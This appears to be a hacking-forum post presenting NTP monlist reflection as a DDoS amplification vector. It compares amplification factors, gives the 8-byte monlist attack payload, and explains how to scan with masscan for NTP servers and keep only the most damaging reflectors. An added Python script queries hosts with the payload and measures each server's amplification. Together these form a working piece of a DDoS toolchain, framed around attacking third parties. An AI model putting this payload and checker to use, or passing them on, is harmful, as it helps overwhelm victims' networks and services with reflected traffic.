NTP DDoS Amplification Vector 03-12-2014, 04:46 AM
#1
Introduction
Hello, today we will be discussing an increasingly common DDoS amplification vector: NTP (Network Time Protocol). NTP is far superior to DNS and Chargen for this purpose: the response is MUCH larger than either of them, and it is split into many packets, which makes it even more damaging (high pps).
Here's a comparison:
- DNS - ~30x amplification factor
- Chargen - ~15x amplification factor
- NTP - 200+ amplification factor (response split into multiple packets of up to 440 bytes each)
How NTP Amplification Works
NTP amplification works by sending a monlist command (the payload is at the bottom of the post). monlist is a mode 7 (private) request that asks the server to return the last 600 IP addresses it has talked to. The request is only 234 bytes long and the response is huge, split into multiple packets: each packet is at most 440 bytes (an 8-byte mode 7 header plus six 72-byte entries), so a server with a full list sends back about 100 packets. When performing an NTP attack, the output depends on the popularity of the servers, not the quantity. Some NTP servers will not have the full 600 addresses in their monlist, so you want to filter these out for the most efficient attack. You can do this by using masscan to scan for NTP servers (UDP port 123) and writing a checker that sends the monlist payload (posted below) and measures the total size of the response it gets back, counting every fragment (remember the response is split into multiple packets, each with a max size of 440!). Servers running ntpd 4.2.7p26 or later, or configured with "disable monitor" or "restrict default noquery", return an error or nothing at all, so a checker should treat those as unusable.
Payloads
Here is the monlist command payload (8 bytes, given as decimal values; in hex: 17 00 03 2a 00 00 00 00):
Code:
23, 0, 3, 42, 0, 0, 0, 0
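Here is an added example (not from the original post, and not the author's Java checker) that does what the "How NTP Amplification Works" section describes: it builds the 8-byte monlist request above field by field, parses the mode 7 header of each reply fragment, and adds up entries and bytes across all fragments to get the amplification. The function names are my own, and make_fake_monlist_reply builds a constructed reply (zero-filled 72-byte entries) so the arithmetic can be checked offline; query_monlist sends the real request to a host you name.

```python
import socket
import struct

# The 8-byte mode 7 (private) request for REQ_MON_GETLIST_1, i.e. the
# "23, 0, 3, 42, 0, 0, 0, 0" payload from the post, written in hex.
MONLIST_REQUEST = bytes([0x17, 0x00, 0x03, 0x2A, 0x00, 0x00, 0x00, 0x00])

# Constants as defined in ntpd's ntp_request.h
MODE_PRIVATE = 7
IMPL_XNTPD = 3
REQ_MON_GETLIST_1 = 42
MONLIST_ENTRY_SIZE = 72          # sizeof(struct info_monitor_1)
MONLIST_ENTRIES_PER_PACKET = 6   # 8 + 6 * 72 = 440 bytes, the max per fragment


def build_monlist_request(sequence=0):
    """Assemble the request byte by byte to show what each field means."""
    byte0 = (0 << 7) | (0 << 6) | (2 << 3) | MODE_PRIVATE  # R=0, M=0, version 2, mode 7 -> 0x17
    byte1 = sequence & 0x7F                                  # A=0, 7-bit sequence number
    return bytes([byte0, byte1, IMPL_XNTPD, REQ_MON_GETLIST_1, 0, 0, 0, 0])


def parse_mode7_header(pkt):
    """Decode the 8-byte mode 7 header at the front of one packet."""
    if len(pkt) < 8:
        raise ValueError("packet shorter than mode 7 header")
    b0, b1, impl, req, err_nitems, mbz_itemsize = struct.unpack("!BBBBHH", pkt[:8])
    return {
        "response": bool(b0 & 0x80),     # R bit: set on replies
        "more": bool(b0 & 0x40),         # M bit: more fragments follow
        "version": (b0 >> 3) & 0x07,
        "mode": b0 & 0x07,
        "sequence": b1 & 0x7F,           # fragment number, 0-based
        "implementation": impl,
        "request_code": req,
        "error": err_nitems >> 12,       # 0 = OK; 4 = NO_DATA, e.g. when monitoring is disabled
        "nitems": err_nitems & 0x0FFF,
        "item_size": mbz_itemsize & 0x0FFF,
    }


def summarize_monlist_response(packets, request_size=len(MONLIST_REQUEST)):
    """Count fragments, entries and bytes across all fragments of one monlist reply."""
    entries = 0
    total_bytes = 0
    fragments = 0
    for pkt in packets:
        hdr = parse_mode7_header(pkt)
        if not (hdr["response"] and hdr["mode"] == MODE_PRIVATE
                and hdr["request_code"] == REQ_MON_GETLIST_1):
            continue  # not a reply to our query
        fragments += 1
        total_bytes += len(pkt)
        if hdr["error"] == 0:
            entries += hdr["nitems"]
    return {
        "fragments": fragments,
        "entries": entries,
        "bytes": total_bytes,
        # amplification measured on the UDP payload: bytes received per byte sent
        "amplification": total_bytes / request_size if request_size else 0.0,
    }


def query_monlist(host, port=123, timeout=2.0):
    """Send one monlist request and collect fragments until the socket times out.
    The M bit marks the last fragment, but UDP may reorder or drop packets,
    so the timeout is the reliable terminator when probing many hosts."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    packets = []
    try:
        sock.sendto(build_monlist_request(), (host, port))
        while True:
            data, _ = sock.recvfrom(2048)
            packets.append(data)
    except socket.timeout:
        pass
    finally:
        sock.close()
    return summarize_monlist_response(packets)


def make_fake_monlist_reply(total_entries):
    """Constructed sample reply (not captured traffic): fragments of up to six
    zero-filled 72-byte entries, the last fragment with the M bit clear."""
    packets = []
    remaining = total_entries
    seq = 0
    while remaining > 0:
        n = min(MONLIST_ENTRIES_PER_PACKET, remaining)
        remaining -= n
        more = 1 if remaining > 0 else 0
        byte0 = 0x80 | (more << 6) | (2 << 3) | MODE_PRIVATE
        hdr = struct.pack("!BBBBHH", byte0, seq, IMPL_XNTPD, REQ_MON_GETLIST_1,
                          n, MONLIST_ENTRY_SIZE)
        packets.append(hdr + b"\x00" * (n * MONLIST_ENTRY_SIZE))
        seq += 1
    return packets


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(query_monlist(sys.argv[1]))   # probe a server you administer
    else:
        print(summarize_monlist_response(make_fake_monlist_reply(600)))
```

With no argument the script summarizes the constructed full-list reply: 100 fragments of 440 bytes, 600 entries, 44,000 bytes, which is the "200+" figure from the comparison once the post's 234-byte request size (headers included) is used instead of the 8-byte UDP payload. A reply with a non-zero error field, or no reply at all within the timeout, is how a patched or "disable monitor" server shows up.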
Other
If you have any questions I'll be glad to help you; if I get enough feedback I will release my checker written in Java.